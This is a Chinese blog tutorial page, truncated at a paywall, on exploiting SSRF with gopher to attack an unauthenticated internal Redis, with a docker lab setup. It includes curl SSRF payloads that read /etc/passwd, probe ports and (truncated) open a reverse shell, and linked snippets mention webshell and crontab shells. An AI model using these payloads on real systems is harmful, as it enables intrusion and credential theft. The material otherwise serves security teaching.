Redis利用漏洞

最新推荐文章于 2025-07-08 07:34:02 发布
最新推荐文章于 2025-07-08 07:34:02 发布
阅读量1.3k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
文章标签: web安全 网络安全 信息安全 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kali_Ma/article/details/121149437

SSRF–(Server-side Request Forge, 服务端请求伪造)
定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务

SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击内网Redis

image.png

SSRF攻击内网Redis

当存在SSRF漏洞且内网中Redis服务可以未授权访问时,利用Redis 任意文件写入成为十分常见的利用方式,一般内网中会存在 root 权限运行的 Redis 服务,利用 Gopher 协议可以攻击内网中的 Redis。

在之前的文章,我们了解了file, dict, gopher协议的常规利用。

# 利用file协议查看文件
curl -v 'http://sec.com/ssrf.php?url=file:///etc/passwd'

# 利用dict探测端口
curl -v 'http://sec.com/ssrf.php?url=dict://127.0.0.1:6379'

# 利用gopher协议反弹shell
curl -v 'http://sec.com/ssrf.php?url=gopher%3A%2F%2F127.0.0.1%3A6379/_....'

【一>所有资源获取<一】
1、200多本网络安全系列电子书(该有的都有了)
2、全套工具包(最全中文版,想用哪个用哪个)
3、100份src源码技术文档(项目学习不停,实践得真知)
4、网络安全基础入门、Linux、web安全、攻防方面的视频(2021最新版)
5、网络安全学习路线(告别不入流的学习)
6、ctf夺旗赛解析(题目解析实战操作)

想要利用 Gopher 协议构造报文我们就必须弄清楚Redis是怎么进行数据传输的即【RESP协议】。

Redis传输协议–[RESP协议]

Redis未授权访问。

使用docker搭建现成的Redis未授权漏洞环境进行试验,过程如下:

  1. 获取Redis定制镜像
# 搜索镜像
docker search ju5ton1y
# 拉取镜像
docker pull ju5ton1y/redis

  1. 运行Redis容器

    ps:想要了解ju5ton1y/redis镜像dockerfile如何编写的同学可以看文末彩蛋~

# 运行Redis
docker run -p 6788:6379 --name redis_test -d ju5ton1y/redis

-p 6788:6379 # 端口映射,格式【主机(宿主)端口:容器端口】

-d ju5ton1y/redis # 后台运行容器,返回容器ID

–name redis_test # 命名容器

image.png

  1. 进入容器,安装tcpdump抓包工具
# 新终端进入Redis容器
docker exec -it redis_test /bin/bash

# 将redis.conf改为无密码未授权
sed -i 's/requirepass 123123/#requirepass 123123/g' /etc/redis.conf

# 重启容器使配置生效
docker restart redis_test

image.png

image.png

# 重新进入容器安装tcpdump
apt-get install tcpdump 
# 监听eth0网卡的6379端口,将报文保存为nopass.pcap
tcpdump -i eth0 port 6379 -w nopass.pcap

image.png

  1. 本地客户端进行连接未授权访问,后使用Wireshark打开n
最低0.47元/天 解锁文章

200万优质内容无限畅学
kali_Ma
关注
SSRF漏洞Redis利用
weixin_39664643的博客
01-21 3610
SSRF漏洞Redis利用篇 SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击内网Redis SSRF攻击内网Redis 当存在SSRF漏洞且内网中Redis服务可以未授权访问时,利用Redis 任意文件写入成为十分常见的利用方式,一般内网中会存在 root 权限运行的 Redis 服务,利用 Gopher 协议可以攻击内网
ssrf漏洞利用-攻击redis
玲珑安全的博客
02-14 100
  ssrf深入利用,打redis,不仅仅是打redis,还可以做很多事情,用redis抛砖引玉     打redis重要的两个协议:   (1)gopher协议   (2)dict协议   用http(s)判断出网:   如果出网,直接gopher://vps:port/,nc监听即可   机器不出网如何判断支持gopher协议:   利用gopher发起get/post请求存在/不存在域名,...
SSRF中Redis利用
2301_80127209的博客
01-23 2136
SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
Redis 突发三大高危漏洞!PoC 已公开,百万服务器面临远程操控风险
最新发布
easylife206的专栏
07-08 1647
漏洞安全研究员Gabriele Digregorio通过负责任披露流程提交并经Redis开发团队确认,源于认证用户对Redis多批量协议命令的滥用,攻击者在完成认证后,可通过特殊构造的命令协议触发异常行为,导致服务中断,虽未突破Redis“认证用户应被信任”的核心安全假设,但可能影响服务可用性。该漏洞源于Redis的Lua脚本引擎在内存管理方面的问题,经过身份验证的用户可借助特制Lua脚本操纵内存回收机制,通过EVAL和EVALSHA命令运行恶意脚本,进而可能在Redis服务器上执行任意代码。
利用SSRF攻击Redis
LUOBIKUN的博客
10-20 5466
SSRF漏洞+redis前置知识实验环境搭建SSRF攻击Redis通过redis写入ssh公钥,获取操作系统权限;直接向Web目录中写webshell;linux计划任务执行命令反弹shell。 前置知识 利用SSRF来攻击靶机的redis服务,需要涉及到的一些知识点: 1,Redis客户端和服务端通信过程,以及常用命令; 2,相关协议,例如dict://协议和gother协议的使用 dict://协议 词典网络协议,在RFC 2009中进行描述。它的目标是超越Webster protocol,并允许客户端
浅析Redis中SSRF的利用
qq_45521281的博客
06-03 1044
文章目录SSRF介绍RESP协议Redis配合gopher协议进行SSRF概述利用条件利用绝对路径写webshell构造payload写ssh公钥构造payload利用contrab计划任务反弹shell构造payload SSRF介绍 SSRF,服务器端请求伪造,服务器请求伪造,是由攻击者构造的漏洞,用于形成服务器发起的请求。通常,SSRF攻击的目标是外部网络无法访问的内部系统。这里我们要介绍的是关于redis中SSRF的利用,如果有什么错误的地方还请师傅们不吝赐教/握拳。 文章中的数据包构造会涉及到re
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2739
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
ssrf漏洞攻击内网Redis复现
懂进攻知防守
07-21 1390
SSRF简介SSRF(Server-SideRequestForgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。大都是由于服务端提供了从其他服务器获取数据的功能,比如使用户从指定的URLweb应用获取图片、下载文件、读取文件内容等。.........
SSRF攻击Redis
cosmoslin的博客
10-27 1588
Redis简介 Redis是数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash(哈希类型)。这些数据类型都支持p
Redis渗透&SSRF的利用-看这一篇就够了
永远都没有了
02-05 2393
关于redis的渗透利用,及SSRF的方式
SSRF && Gopher && Redis && FastCGI
3569
05-26 2521
之前没尝试过 SSRF 用 Redis,虽然是老的东西了,但是自己试一下socat : socat是一個netcat(nc)的替代產品,可以稱得上nc++。socat的特點就是在兩個流之間建立一個雙向的通道。socat的地址類型很 多,有ip, tcp, udp, ipv6,pipe,exec,system,open,proxy,openssl,等等。redis 新版本貌似开启了safemode,...
浅知Redis中SSRF的利用
qq_51558360的博客
02-09 884
SSRF介绍 SSRF,服务器端请求伪造,服务器请求伪造,是由攻击者构造的漏洞,用于形成服务器发起的请求。通常,SSRF攻击的目标是外部网络无法访问的内部系统。 RESP协议 Redis服务器与客户端通过RESP(REdis Serialization Protocol)协议通信。 RESP协议是在Redis 1.2中引入的,但它成为了与Redis 2.0中的Redis服务器通信的标准方式。这是您应该在Redis客户端中实现的协议。 RESP实际上是一个支持以下数据类型的序列化协议:简单字符串,错误,整数,
Weblogic - SSRF攻击内网redis服务漏洞
HAKUNAMATATATTA的博客
12-05 1313
SSRF(Server-Side Request Forgery),服务端请求伪造,是一种由攻击者构造形成由服务端发起请求的一个漏洞,一般情况下,SSRF攻击的目标是从外部网络无法访问的内部系统。
SSRF-利用dict协议-攻击redis
m0_62284238的博客
10-14 1022
SSRF漏洞利用dict协议攻打redis
Redis在SSRF中的应用
feng的博客
10-06 3466
偶然找到的一篇文章,觉得写的很不错。本来只是收藏而不是转载,但是我发现这篇文章的原文已经挂了,因此就转载了过来。
Redis存在安全漏洞
曼陀罗的博客
12-20 1325
Redis是美国Redis公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis存在安全漏洞。攻击者利用漏洞使用特制的Lua脚本触发堆栈缓冲区溢出漏洞,从而远程执行代码。CVE编号:CVE-2024-31449。
SSRF攻击Redis写入webshell
渗透之路,攻防之间皆学问
05-19 7255
目录 攻击环境设计 redis服务器搭建 dict探测内网端口 利用gopher协议写入webshell 关于ssrf攻击,传送门 -》SSRF漏洞原理与利用方式。当我们检测出一个网站存在SSRF漏洞的时候,我们就可以探测当前主机开放的端口,而这些端口往往我们从外网是不能直接探测到的,所以可以尝试利用ssrf探测内网开放的端口。 漏洞利用前提: 知道网站根目录,这里假设知道了根目录 根目录具有写文件的权限 攻击环境设计 操作系统:win2012 SSRF漏洞环境搭建,利用皮卡丘靶场 .
浅谈Redis漏洞
weixin_43960884的博客
07-20 491
Redis未授权访问漏洞 Redis是一种key-value键值对的非关系型数据库 默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行未授权的访问Redis Redis还支持本地存储,也就导致任意文件写入,攻击者在未授权访...
redis 漏洞利用
09-30
redis 漏洞利用可以通过redis-rogue-server工具来实现。该工具适用于目标存在Redis未授权访问漏洞时使用,无法对Redis密码进行认证。你可以从https://github.com/n0b0dyCN/redis-rogue-server下载该工具。请注意,Redis官方不建议在Windows下使用Redis,官网上没有Windows版本可以下载。不过,微软团队维护了一个开源的Windows版本,可以在https://github.com/microsoftarchive/redis找到。然而,该版本只支持3.x版本。在Linux下,可以利用redis漏洞进行攻击,例如将shell写入到开机启动项或者写webshell到根目录。请注意,漏洞利用的具体思路与Linux下的redis漏洞利用类似。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值